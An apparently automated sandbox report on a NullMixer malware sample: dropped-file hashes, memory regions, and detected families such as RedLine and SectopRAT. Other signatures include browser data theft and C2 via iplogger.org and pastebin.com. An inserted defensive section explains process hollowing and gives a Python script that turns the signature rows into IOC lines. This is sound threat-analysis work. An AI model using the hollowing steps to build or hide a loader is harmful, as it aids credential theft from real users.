memory/4132-113-0x00000000055C0000-0x0000000005626000-memory.dmp
memory/4132-112-0x0000000005420000-0x0000000005442000-memory.dmp
memory/3936-107-0x0000000003150000-0x000000000316E000-memory.dmp
memory/3484-151-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/4600-143-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3444-156-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-C4I37.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/4708-178-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4708-169-0x0000000000400000-0x000000000051C000-memory.dmp
memory/4708-177-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4708-176-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4708-175-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4708-173-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/4132-185-0x0000000006110000-0x000000000615C000-memory.dmp
memory/4896-188-0x0000000005400000-0x000000000550A000-memory.dmp
memory/3520-194-0x0000000000400000-0x0000000000422000-memory.dmp
memory/312-197-0x0000000004C70000-0x0000000004CAC000-memory.dmp
memory/312-195-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4896-187-0x00000000052D0000-0x00000000052E2000-memory.dmp
memory/4896-186-0x00000000058F0000-0x0000000005F08000-memory.dmp
memory/4132-179-0x0000000005BC0000-0x0000000005BDE000-memory.dmp
memory/4896-184-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Thu128b511c77e8c.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/2564-207-0x0000000000400000-0x0000000002F01000-memory.dmp
memory/4132-221-0x0000000006DF0000-0x0000000006E0E000-memory.dmp
memory/4132-211-0x000000006F960000-0x000000006F9AC000-memory.dmp
memory/4132-210-0x0000000006200000-0x0000000006232000-memory.dmp
memory/5036-223-0x000000006F960000-0x000000006F9AC000-memory.dmp
memory/4132-222-0x0000000006E20000-0x0000000006EC3000-memory.dmp
memory/5036-234-0x00000000072B0000-0x00000000072CA000-memory.dmp
memory/4132-233-0x00000000075C0000-0x0000000007C3A000-memory.dmp
memory/5036-235-0x0000000007330000-0x000000000733A000-memory.dmp
memory/5036-236-0x0000000007520000-0x00000000075B6000-memory.dmp
memory/4132-237-0x0000000007180000-0x0000000007191000-memory.dmp
memory/4132-246-0x00000000071B0000-0x00000000071BE000-memory.dmp
memory/4132-247-0x00000000071C0000-0x00000000071D4000-memory.dmp
memory/4132-249-0x00000000072B0000-0x00000000072CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XGud2je.9Ck
| MD5 | 4c8e336e944e027040c10a8735cd24f9 |
| SHA1 | d30e6ae06be8430c4e1a214d8bb0139e307faae5 |
| SHA256 | 220aac9ab0536f37faaf97c10494397045ae154daa6b2e3e33055704fbb855c2 |
| SHA512 | da3c801714d956bbc3fe985999ed093acee2b7ced14b13cc161fa339ba6f3c7002aff8fbccd5e596b7d90b7293918040a38e5bf19173995c367751fda94c5193 |
C:\Users\Admin\AppData\Local\Temp\1FRnX.N
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
memory/4132-256-0x00000000072A0000-0x00000000072A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6Q6HY.Re
| MD5 | 05e4ce7aaf4c9c2a0bb4399b9d01208d |
| SHA1 | 1f2a1a8356e2d909943bbcae8efbe032854fa831 |
| SHA256 | 374202f3e07fab4202655ea39339f88829a4702cb8f92ab6a2705a6e3aae0d36 |
| SHA512 | 9a8e0806c99cbbef62ac294fc8d9aa5dc1d0060f57ff075650dd58a375b7f309377c52c1154be1f394694fde994615b68b882f4be9b18abf8f34cef1096d3543 |
C:\Users\Admin\AppData\Local\Temp\ISA502G.S7
| MD5 | 5d2571a51baa9b38d7180dbde1ebde3a |
| SHA1 | 4752e60d9ce426a82160a4da90c12a0a60487e75 |
| SHA256 | 9d5629b87d747c1791fe07e8efc410f5e8b0626033be586d83f549db50d527be |
| SHA512 | b59c4d7e6bc54be57934c659b37084f52cadc861746eccdd86ed6e0a0e862005dbf3716d171db773e77df99d015dfaf80b4273f8798c9e224376d1c44a2e8e50 |
memory/1256-262-0x00000000026B0000-0x0000000002845000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 296ea7df007b307cb61e80ed6a05e875 |
| SHA1 | 3dd71ddc45f20b070915f47c1253c4dd5138c8a5 |
| SHA256 | 6eeedbc1e3770e55a7d8755fdf7c17cc60b914538a75d56c3899db41c789780b |
| SHA512 | 5da5171ac004f748c8800c51c8820dcf78511cac255423f8be7c695e915c8f5df99b14ecc3c91278d73f00dfb46282a480b87364f87e810543072eb69adf91b7 |
C:\Users\Admin\AppData\Local\Temp\y~A7gjIO.E
| MD5 | 4db3690c9cf2525f1919181be7200189 |
| SHA1 | 29889e5a2e8e1030c1c8517b24c44c3b555a296f |
| SHA256 | 721160b9f762c517522c56326e9040fa1457703a9aead210a4b2905a5122957c |
| SHA512 | aafda968325d1501066979771fb137cc354120de81d0aa9ccbc407ced9aceba1f3fd984f4857aa00424156bd6afd054515cc8f856e2750aaee7be5d242b90d51 |
C:\Users\Admin\AppData\Local\Temp\Dema.eP
| MD5 | 692db0108f3840d6536e482ab44a8ddd |
| SHA1 | 18062c95b2d2c7864973d6c40f76e3b6a448c58e |
| SHA256 | 0f6161b3927445039e7297404b841a7ea6968d88ce80d618307ea744d1b7af11 |
| SHA512 | 48bf5c14de18f77e731b86c919089429a9ace6f9edf93e6bcb73ca614edcf10a387b7737b85d3730036e35db09ff68c02e6c538228cb3ae48bf20e879ea0509e |
memory/1256-275-0x0000000002C30000-0x0000000002CD5000-memory.dmp
memory/1256-282-0x0000000002CE0000-0x0000000002D72000-memory.dmp
memory/1256-279-0x0000000002CE0000-0x0000000002D72000-memory.dmp
memory/1732-283-0x0000000000400000-0x0000000002F21000-memory.dmp
memory/4380-287-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/4600-286-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 605b50d3a433c4ce3111c0aed99efc71 |
| SHA1 | bd1852cdfe9282965cf68ecaedcaa1a880e44f63 |
| SHA256 | 4d461bbc08f1710b05723f7cf0499d483013c3bae2efc8415b25fed4dc8f8396 |
| SHA512 | dea6a503a52c3d459e04963687cc18ad59fd103b1c0decdf4f834974e714fce524267452669e9b4b892ea7b1a26e1c2624a1f92c1d0bfad60aec8b7a5bcbb21e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/1256-303-0x00000000026B0000-0x0000000002845000-memory.dmp
memory/1732-304-0x0000000000400000-0x0000000002F21000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | bb1bf2dac516fe4ffd11e3d3d025fd4e |
| SHA1 | 536216889810b6a6c5f39457dcb384bf61d2f22a |
| SHA256 | e0c8d72d967c8a1adaccba01caef39aba2c18d5415cb6acd420b12561a18c354 |
| SHA512 | 6dafcdfdde62cf57a4fbde4e4fd72e06d58c73f57096befa88d8f935c38a204846a50c81e1ad1113b911af1a0bc269bee79822fca882e1ddf423031feecee0e8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d8a7eb78185ede0c64accddeb8ab0482 |
| SHA1 | c136be978dfb3ad62a23a2c6ca1c4d2a1ece1ee4 |
| SHA256 | 43b398b5ba617bf889d63e1f9093c69d25d43ca98496d38c4ad58a088e01f154 |
| SHA512 | b9d98d2bc0d66d27f6700a6cad501f942b855e6d725796e782585851441b25874823b6012b60abed47d4f0496f3d5e6510a59658cbd07cf044c846593e352433 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 11efaec7e0b55372d55efe3a892d047a |
| SHA1 | ba600bed4d894090a2e76dc4e361cfd84a42f2fe |
| SHA256 | 94b1993f363de64e4650fde3e8d50d246b23289cddd170eb4dcb1c2590212157 |
| SHA512 | f0f612b5dfd1d209039828657a96e846f0b8ecf1f51f70d641e93f578439d23d1d5b573358ac30ace4c286ab3ba39f9afe2cfb9fc19106085602657dfaa1cf7b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 36e6e3aed9cf36e5cbf572f21c8a0279 |
| SHA1 | 89106ab5120e5c794dbc32e7f51affcff70994da |
| SHA256 | 799cdf3785c64107ab23d3a45730d0004b8a0182fdf2af75a47a661c273c3b3d |
| SHA512 | c524642a682d7da568c7f26af49a0a1a0759560bff177c44284bf61760f3ea4ff54ecb9d72cb5f20befe6f73f2dfdd18998648cdfb42741e8b5ed9dbbc56509f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | de7541625e41b14d55dff4b9b0e9654c |
| SHA1 | 29a1eb34bf62d33133be124ddca63a2104004a66 |
| SHA256 | f24fb9832e59406319fe9a03a45961bcc904922397c83f5e24b0b5a8d825e053 |
| SHA512 | 2c4a911902f56ac495e384eb67f076d1273c08aedb9ea81d32ca6abacd0c24580b93b59f766309b3d81bd08bf00dc9287859f452d4a9c5aee1d9a1fb299cfddf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2563d71430e533411340760948dbf8a6 |
| SHA1 | 16d5a871ee1cae7268b329f98505c62d216ffbeb |
| SHA256 | 0064b418c9fe76c2d4ff1764c0cf9db362b98234df3582e1f979bfe5addab297 |
| SHA512 | b0c0072620c546af69c8afd8a00d4d1135bf49e48a71ab658ece943082d49698bb67c2a4eeb935215dab2b1898200e51936da04056ec52e34075fa673f16215f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 5ca1629a2651ea56fd186ffe1cd64764 |
| SHA1 | e3983b99faae1b433879989a2a3778752775908e |
| SHA256 | f38cc27069e9b945d01e6d810acd50457b5f58555cfbf9c3472d42b0dc299cff |
| SHA512 | 4819e083a12642666358b144a4ac42a4e16879ac06bee36a23144f0e64d4627fb6818395f90adbaa706bb8a14df729a1541316ab63379df6dc2161d63037e502 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e2dae626babe253704ab21c5dd47d7f8 |
| SHA1 | fe51f1a63fe8895df52936ad59791217f0b110b9 |
| SHA256 | 08ec2520ab447c009d82f1f8cabcffc4f7215e16624c37238f69bbabe65320a5 |
| SHA512 | 0e5262d410915f659e588d0570aa318a14a223c9d1e46f56f402a86aee7b91869e385559e66e7aabc7682cabaa84035881e75fd7d81f42b6584a73026133c3c2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6ed87b5804c171802330662469f422a5 |
| SHA1 | dee288e90deb2cfabf458b6b8238e1e1530c80e0 |
| SHA256 | 668561b71c40ff9692561599cd1b1eb602a88bf326ddc6a8b9a0ab7efd336fbb |
| SHA512 | 17039c1cc596e329eee6188aea59b00731f3da1f5a530c3186f38fbbdf93a6ab9fd4301cb6fda08a963c7a6372a1a19983da48b6b8b605a2a6d633f1df7ae84e |
memory/1256-397-0x0000000002CE0000-0x0000000002D72000-memory.dmp
memory/1256-398-0x0000000002D80000-0x0000000003B98000-memory.dmp
memory/1256-399-0x0000000003BA0000-0x0000000003C2B000-memory.dmp
memory/1256-400-0x0000000003C30000-0x0000000003CB7000-memory.dmp
memory/1256-403-0x0000000003C30000-0x0000000003CB7000-memory.dmp
memory/1256-404-0x00000000002E0000-0x00000000002E1000-memory.dmp
memory/1256-405-0x00000000002F0000-0x00000000002F4000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3ca89e15aef94fc49ef3ec7d9e78d23a |
| SHA1 | cd35f76e0f0d6c193ad3ba8b22a5b01c2582a2b5 |
| SHA256 | 1b3a199ad2bc21e10e7e4fa9a00f3549c4f00665725711c16b823765d0703890 |
| SHA512 | 57029bc67808c8c71a00e5b5c74487652fbdeafa49f92597a4e308db418fac85ad139608564095c2e9007b21978e7592caab49f808a60c38dbd3c51411e35e21 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 60d2983fefd991bee7e9f60e0cd0b3e6 |
| SHA1 | c8da4806bd8950e9e33a21c39b287dfde9c23c5f |
| SHA256 | 0653646c00f9863684f633131de9f9cd02c60bd0e7c02aa40fc1655e371b0440 |
| SHA512 | 714d21c7afebe7b1b47c81109a6bd8b2f48d9027af2d11e78b4c6701fd41eef2dca2a3618e9e4cf09539f468e84eecab767537f055e8f34904da91fc83dfc450 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | ea0c592c1dcff334387f093b97c0fd0e |
| SHA1 | f125c5150b20874cfdc1eb926583aa508ff5260e |
| SHA256 | 802fbbf24f18cb3c47fe92175eb62c11f6efcc2ead6b5036300e0d2767a76655 |
| SHA512 | 16420266e71975fead48474663efa5d12fc431d4dae36b15acec51d8b8f8ab2b8d67830c11bc70ff2809097e315efa493e9cbcdef4f366af019335db0a58c297 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 113b143568d7dcd7092e5d314ba8c574 |
| SHA1 | 3923cc66857050202c15d83d92ce8aa851356130 |
| SHA256 | 8a3b21e7eedc9986e44a168f9a5141e53d8b0e882bd2ca6f3870db68eaad1ad4 |
| SHA512 | 4342fd78ac9fd53cd635ef86ba6ceebfe52b63d51bdd80de158553918c2db72f24fb47b8d54e6a9fdaf82dbca828d428e07e36fe44e9c3c1859908efcaacd770 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-22 07:31
Reported
2024-11-22 07:33
Platform
win7-20240729-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2072 set thread context of 2744 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe |
| PID 2116 set thread context of 2808 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe |
| PID 1724 set thread context of 1640 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe |
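Each of the three SetThreadContext rows above has the same image path as process and as target: the dropped executable spawns a copy of itself, overwrites the child's memory and resumes it through the thread context, which is the self-hollowing (RunPE) pattern RedLine and SectopRAT loaders use to unpack. The script below is an added example for this page, not sandbox tooling; it parses those signature rows, labels each pair as self-hollowing or cross-process injection by comparing basenames, and joins the parent image to the SHA256 recorded for the same filename in the Files section, since the per-run temp directory (7zS44A6CE57 here, 7zS43C94A97 in the other detonation) makes a full-path join useless. The sample rows and hashes are copied from this report; the pattern labels are this example's own.

```python
"""Turn "Suspicious use of SetThreadContext" sandbox rows into hollowing
indicators joined with dropped-file hashes.

SIGNATURE_ROWS and DROPPED_FILES are a constructed sample copied from this
report: the three signature rows, and the SHA256 values the Files section
records for the same basenames (from a different run directory).
"""
import re
from ntpath import basename  # Windows path semantics regardless of host OS

SIGNATURE_ROWS = r"""
| PID 2072 set thread context of 2744 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe |
| PID 2116 set thread context of 2808 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe |
| PID 1724 set thread context of 1640 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe |
"""

DROPPED_FILES = {
    "Thu126011caea28.exe": "90fc68c39590b8d6e7783e52e1660ff9ec68daee37940bf49399d95e6ad1fe7b",
    "Thu128b511c77e8c.exe": "314846b9ef02e6cfd78a230e3966cee0f6b746a54f05a845e5af2817396ff2f1",
    "Thu12912263469836d.exe": "056091d19c1724c295197ccf6967d5b0cd98e87fa43dbbfd53de049526588b8d",
}

ROW_RE = re.compile(r"PID (\d+) set thread context of (\d+)")


def parse_signature_rows(text):
    """Parse description/indicator/process/target rows into context events."""
    events = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue
        m = ROW_RE.search(cells[0])
        if not m:
            continue
        events.append({"ppid": int(m.group(1)), "pid": int(m.group(2)),
                       "process": cells[2], "target": cells[3]})
    return events


def hollowing_indicators(events, dropped):
    """Label each event and attach the parent image's SHA256 when known.

    Same basename on both sides means the parent hollowed a suspended copy
    of itself; a different basename is injection into another process.
    """
    out = []
    for ev in events:
        src, dst = basename(ev["process"]), basename(ev["target"])
        pattern = "self-hollowing" if src.lower() == dst.lower() else "cross-process-injection"
        out.append({**ev, "image": src, "pattern": pattern, "sha256": dropped.get(src)})
    return out


def ioc_lines(indicators):
    """One de-duplicated line per image for a blocklist or hunt query."""
    seen = {}
    for ind in indicators:
        seen.setdefault(ind["image"], f'{ind["image"]} {ind["pattern"]} sha256={ind["sha256"]}')
    return sorted(seen.values())


if __name__ == "__main__":
    for line in ioc_lines(hollowing_indicators(parse_signature_rows(SIGNATURE_ROWS), DROPPED_FILES)):
        print(line)
```

On endpoint telemetry the equivalent signal is a process creating a child of its own image with CREATE_SUSPENDED, followed by NtUnmapViewOfSection/WriteProcessMemory on the child and NtSetContextThread before the resume; the sandbox row is the last step of that sequence.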
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
